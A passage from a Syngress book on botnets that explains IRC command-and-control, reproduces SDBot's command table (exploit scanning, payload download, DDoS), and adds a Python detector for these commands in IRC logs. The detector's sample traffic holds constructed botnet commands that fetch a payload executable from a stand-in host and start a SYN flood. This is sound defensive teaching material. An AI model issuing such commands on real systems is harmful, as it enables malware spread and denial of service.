Botnets - The killer web applications

www.syngress.com
Chapter 2 • Botnets Overview

iplist.exe >> info.txt
FHS.exe >> info.txt
The bot also took this opportunity to start its rootkit detector and to hide and launch the password-collection programs.
Waiting for Orders and Retrieving the Payload
Once secured, the botnet client listens on the C&C communications channel. In this overview we describe botnets that are controlled over IRC channels; the following chapter describes alternative C&C technologies.
Each botnet family has a set of commands that it supports. For example, SDBot supports the commands in Table 2.1, among others (adapted from the Know Your Enemy series, "Tracking Botnets—Botnet Commands" by the Honeynet Project).
Table 2.1 Botnet Command Examples

Function                  Command Code
Recruiting                (scanall|sa)
                          (scanstats|stats)
                          scandel [port|method]  ([method] can be one of a
                            list of exploits including lsass, mydoom,
                            DameWare, etc.)
                          scanstop
                          (advscan|asc) [port|method] [threads] [delay] [minutes]
Downloading and updating  (update|up) [url] [botid]
                          (download|dl) [url] [[runfile?]] [[crccheck]] [[length]]
Execute programs locally  (execute|e) [path]
                          (findfile|ff) filename
                          (rename|mv) [from] [to]
                          findfilestopp
DDoS                      syn [ip] [port] [seconds|amount] [sip] [sport] [rand]
                          udp [host] [num] [size] [delay] [[port]]
                          ping [host] [num] [size] [delay]
There are more details about IRC C&C in Chapter 8.
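The command set in Table 2.1 is also what a defender watching IRC traffic can key on. The following is an added example, not code from the book or from the Honeynet Project: a small parser that extracts the text of IRC PRIVMSG lines and matches it against the Table 2.1 command grammar, pulling out the arguments an incident responder cares about (the download URL for update/download commands, the victim and port for DDoS commands, the exploit method for advscan). It also covers the payload-update step described below, since that step is driven by the same download/update commands. The channel name, nicknames, hosts and URLs in the sample lines are constructed for the example, and the assumption that commands are prefixed with "." or "!" is an assumption of the example rather than something the table states.

```python
"""Recognise SDBot-style IRC C&C commands (Table 2.1) in raw IRC lines.

Added example, not code from the book or the Honeynet Project. Sample
traffic below is constructed; the '.'/'!' command prefix is assumed.
"""
import re
from dataclasses import dataclass, field

# Command aliases from Table 2.1 mapped to the table's function category.
COMMANDS = {
    "scanall": "recruiting", "sa": "recruiting",
    "scanstats": "recruiting", "stats": "recruiting",
    "scandel": "recruiting", "scanstop": "recruiting",
    "advscan": "recruiting", "asc": "recruiting",
    "update": "update", "up": "update",
    "download": "update", "dl": "update",
    "execute": "local_exec", "e": "local_exec",
    "findfile": "local_exec", "ff": "local_exec",
    "findfilestopp": "local_exec",
    "rename": "local_exec", "mv": "local_exec",
    "syn": "ddos", "udp": "ddos", "ping": "ddos",
}

# IRC line shape: ":<nick!user@host> PRIVMSG <target> :<text>"
PRIVMSG_RE = re.compile(
    r"^(?::(?P<prefix>\S+)\s+)?PRIVMSG\s+(?P<target>\S+)\s+:(?P<text>.*)$"
)


@dataclass
class BotCommand:
    sender: str
    target: str
    command: str
    category: str
    args: list
    detail: dict = field(default_factory=dict)


def parse_bot_command(line):
    """Return a BotCommand if the IRC line carries a Table 2.1 command, else None."""
    m = PRIVMSG_RE.match(line.strip())
    if not m:
        return None  # not a PRIVMSG (PING, JOIN, MODE, ...)
    text = m.group("text").strip()
    # Assumed command prefix; the table itself lists bare command names.
    if text and text[0] in ".!":
        text = text[1:]
    parts = text.split()
    if not parts:
        return None
    name = parts[0].lower()
    if name not in COMMANDS:
        return None
    cmd = BotCommand(
        sender=(m.group("prefix") or "").split("!")[0],
        target=m.group("target"),
        command=name,
        category=COMMANDS[name],
        args=parts[1:],
    )
    # Extract the arguments a responder needs to act on the command.
    if name in ("update", "up", "download", "dl") and cmd.args:
        cmd.detail["url"] = cmd.args[0]          # new payload location
    elif name in ("syn", "udp", "ping") and cmd.args:
        cmd.detail["victim"] = cmd.args[0]       # DDoS target
        if name == "syn" and len(cmd.args) > 1:
            cmd.detail["port"] = cmd.args[1]
    elif name in ("advscan", "asc") and cmd.args:
        cmd.detail["method"] = cmd.args[0]       # exploit used for recruiting
    return cmd


def scan_irc_log(lines):
    """Run the parser over IRC lines and return only the bot commands found."""
    return [c for c in (parse_bot_command(l) for l in lines) if c]


# Constructed sample traffic: two ordinary lines and three bot commands.
SAMPLE_LINES = [
    ":herder!h@example.test PRIVMSG #botsrv :.advscan lsass 100 5 0",
    ":alice!a@example.test PRIVMSG #chat :hi everyone",
    ":herder!h@example.test PRIVMSG #botsrv :.download http://198.51.100.7/p.exe 1 1",
    "PING :irc.example.test",
    ":herder!h@example.test PRIVMSG #botsrv :.syn 203.0.113.9 80 600",
]

if __name__ == "__main__":
    for c in scan_irc_log(SAMPLE_LINES):
        print(f"{c.sender} -> {c.target}: {c.category} {c.command} {c.detail}")
```

Run against a capture of the C&C channel, the output gives the herder's nick, the channel, and for each command the category and the one argument worth blocking or sinkholing (the payload URL or the DDoS victim). Matching on bare words like "e" or "up" in ordinary chat channels will produce false positives; in practice the match should be restricted to channels the bot is known to join or combined with the other indicators from the infection sequence.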
The botnet client will then request the associated payload. The payload is the term I give the software representing the intended function of this botnet client. Note from the diagram in Figure 2.1 that the function can change at any time. This is the beauty of a modular design: updates can be sent prior to the execution of any assigned task. The primary function of the botnet client can be changed simply by downloading new payload software, designating the target(s), scheduling the execution, and setting the desired duration of the action. The next few paragraphs describe some of these potential payloads.